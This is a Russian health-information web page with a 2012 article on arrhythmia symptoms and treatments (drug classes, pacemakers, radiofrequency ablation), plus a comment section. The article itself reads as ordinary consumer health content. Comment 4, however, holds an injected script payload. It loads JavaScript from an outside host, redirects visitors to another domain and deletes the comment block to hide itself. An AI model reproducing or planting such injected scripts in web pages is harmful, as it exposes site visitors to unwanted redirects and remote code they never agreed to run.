Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Симптомы и лечение аритми...  >>  Симптомы и лечение аритмии
 
Обратная связь
 

Симптомы и лечение аритмии

Размер шрифта
25 мая 2012 09:00
  • google_analytics: false
  • Нравится

Как известно, для аритмии наиболее характерен симптом нарушения ритма сердца. Какие еще проявления этого заболевания бывают, и как его лечить?

Симптомы

Выраженность симптомов аритмии зависит от вида этого заболевания и частоты сердечного ритма. Можно назвать следующие основные симптомы:

  • Ощущение сердцебиения или перебоев в работе сердца.

    Для пароксизмальных тахикардий характерно внезапное появление и внезапное прекращение приступов сердцебиения, т.е. ощущения толчков в области сердца. Как правило, они появляются в момент перехода нормального ритма в аритмию, и наоборот.

  • Головокружение, потеря сознания и судороги возникают в связи с резким уменьшением количества крови или остановкой сердца.
  • Тупая, ноющая, иногда острая боль в груди, которая часто обусловлена недостаточным поступлением крови к сердцу.
  • Одышка, быстрая утомляемость, отеки голеней и стоп возникают, когда развивается застойная сердечная недостаточность при постоянном нарушении ритма (например, при мерцательной аритмии).

Лечение

  1. Медикаментозная терапия

Существует четыре группы антиаритмических препаратов:

  • Мембраностабилизирующие препараты (хинидин, лидокаин, аллапинин). Известно, что при многих заболеваниях в первую очередь страдают клеточные мембраны. Эффективность комплексной терапии аритмии зависит от восстановления структуры клеточных мембран и их защиты, что обеспечивают препараты, которые стабилизируют мембраны клеток.
  • Ко второй группе относятся блокаторы бета-адренорецепторов – пропранолол и его аналоги. Эти препараты замедляют скорость проведения электрического импульса, уменьшают частоту и силу сердечных сокращений.
  • Основным представителем третьей группы является амиодарон, который замедляет синусовый ритм и удлиняет время проведения возбуждения.
  • Четвертая группа включает антагонисты кальция. Основным и наиболее эффективным антиаритмическим препаратом этой группы является верапамил, который уменьшает частоту сердечного ритма и угнетает проводимость в атриовентрикулярном узле.
  1. Установка электрокардиостимулятора

Кардиостимулятор – это медицинский прибор, который предназначен для коррекции сердечного ритма. Основной задачей кардиостимулятора является навязывание определенной частоты сокращений, когда сердце бьется редко, или когда наблюдается электрофизиологическая несогласованность в сокращении предсердий и желудочков. Суть этой несогласованности заключается в том, что импульс, который идет из синусового узла, распространяется по предсердиям, но не доходит до желудочков. В результате, предсердия сокращаются в своем, более частом, ритме, а желудочки - в своем.

Кардиостимулятор имеет небольшие размеры и находится в герметичном металлическом корпусе. Современные кардиостимуляторы воспринимают собственную электрическую активность сердца и способны различить адекватный ритм сердца или его нарушение. Как только прибор получает информацию о нарушении ритма, он начинает генерировать импульсы для стимуляции миокарда.

  1. Радиочастотная абляция

Радиочастотная абляция состоит в восстановлении нормального ритма сердца путем прижигания очень маленького, тщательно выверенного, участка миокарда. Обычно эта операция проводится под местной анестезией.

В зависимости от отделов сердца, на которых планируется вмешательство, пациенту прокалывают бедренную вену или артерию, подключичную вену. Через прокол под контролем рентгена в полость сердца вводят электроды. Сначала врач выполняет электрофизиологическое исследование сердца для обнаружения зон, являющихся источником аритмии, а затем воздействует на эти зоны радиочастотной энергией, прижигая их. После этого вновь проводится электрофизиологическое исследование для оценки эффективности лечения, и если показатели удовлетворяют врача, то операцию заканчивают.

Операция применяется при мерцательной аритмии и пароксизмальных наджелудочковых тахикардиях.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Татьяна 43

15 января 2015 в 20:19

Комментарий удален за нарушение Правил общения

2 - Татьяна 43

15 января 2015 в 20:20

Комментарий удален за нарушение Правил общения

3 - Татьяна 43

18 января 2015 в 11:53

Комментарий удален за нарушение Правил общения

4 - zzzzzz

30 июня 2015 в 23:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Больное сердце: скрытые признаки   Такая разная аритмия   Частые симптомы болезней сердца   За здоровым сердцем – в Турцию  
22 июня 2013Грецкие орехи спасут от инфаркта 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 
12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого? 04 июня 2013У вас лысый муж? Он может умереть от инфаркта
 

Слайдшоу

1
Вся правда об аритмии
Как не подцепить клеща
7 ранних признаков инфаркта

Тесты

Грозит ли вам инфаркт миокарда?
Сколько вы проживете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.